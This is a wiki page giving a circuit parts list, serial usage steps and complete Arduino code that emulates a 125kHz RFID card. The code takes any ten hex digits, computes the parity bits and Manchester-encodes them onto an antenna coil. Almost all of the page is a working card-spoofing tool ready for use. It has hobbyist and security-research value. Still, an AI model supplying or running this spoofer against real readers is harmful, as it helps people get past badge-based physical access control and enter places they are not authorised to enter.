125Khz RFID spoofing
Versione del 7 apr 2019 alle 16:52 di Renzo (discussione | contributi) (Creata pagina con '== Circuit schematics == 450px List of materials: * an antenna (there are many 125khz antennas on e-bay) * Capacitor 1nF (maybe this valu...')
Circuit schematics
List of materials:
- an antenna (there are many 125khz antennas on e-bay)
- Capacitor 1nF (maybe this value must be tuned for the best resonance of the antenna)
- 4 diodes 1N4148
- Resistor 100Kohm
- zener diode 5.1v
Usage
Connect the two terminals of the circuit to GND and pin 12.
Compile and Load the code herebelow.
Open a serial terminal (9600 bit/s), e.g.
screen /dev/ttyUSB0 9600
Type in 10 hexadecimal digits (characters are not echoed). (the code computes all the parity bits, both horizontal and vertical).
Code
#define coil_pin 12
char data[10];
int data_count =0;
int spoofed_card[64] = {1,1,1,1,1,1,1,1,1}; //header
void setup()
{
pinMode(coil_pin, OUTPUT);
digitalWrite(coil_pin, LOW);
Serial.begin(9600);
}
void loop()
{
if(Serial.available()){
char key = Serial.read();
if(key != '\0') {
data[data_count] = key;
if(data_count == 9){
spoofcard();
data_count = 0;
}
else
data_count ++;
}
}
}
void compute_data(){
// Compute raw data
int data_iterator;
int bit;
int bit_set;
for(bit = 0, data_iterator = 0; bit < 59; bit += 5, data_iterator++){
int raw_data = HexToDec(data[data_iterator]);
spoofed_card[bit+9] = !! (raw_data & 8);
spoofed_card[bit+10] = !! (raw_data & 4);
spoofed_card[bit+11] = !! (raw_data & 2);
spoofed_card[bit+12] = !! (raw_data & 1);
}
int i = 8;
// CRC ROW
for(int c = 3; c < 13; c++){
bit_set = 0;
for(i++; i < ((c * 5) - 2); i++)
if(spoofed_card[i]) bit_set++;
spoofed_card[(c * 5)-2] = ((bit_set % 2) != 0);
}
// CRC COL
for(int c = 0; c < 4; c++){
bit_set = 0;
for(int a = 9; a < 55; a += 5){
if(spoofed_card[a + c]) bit_set++;
}
spoofed_card[c + 59] = ((bit_set % 2) != 0);
}
}
void spoofcard(){
compute_data();
for(int h = 0; h < 50; h++)
spoofnow();
}
void send_manchester(int clock_half, int signal)
{
int man_encoded = clock_half ^ signal;
if(man_encoded == 1)
digitalWrite(coil_pin, LOW);
else
digitalWrite(coil_pin, HIGH);
}
void spoofnow(){
for(int i = 0; i < 64; i++)
{
send_manchester(0, spoofed_card[i]);
delayMicroseconds(256);
send_manchester(1, spoofed_card[i]);
delayMicroseconds(256);
}
}
int HexToDec(char hexa)
{
if (hexa >= '0' && hexa <= '9')
return hexa - '0';
else if (hexa >= 'A' && hexa <= 'F')
return hexa - 'A' + 10;
else if (hexa >= 'a' && hexa <= 'f')
return hexa - 'a' + 10;
else
return 0;
}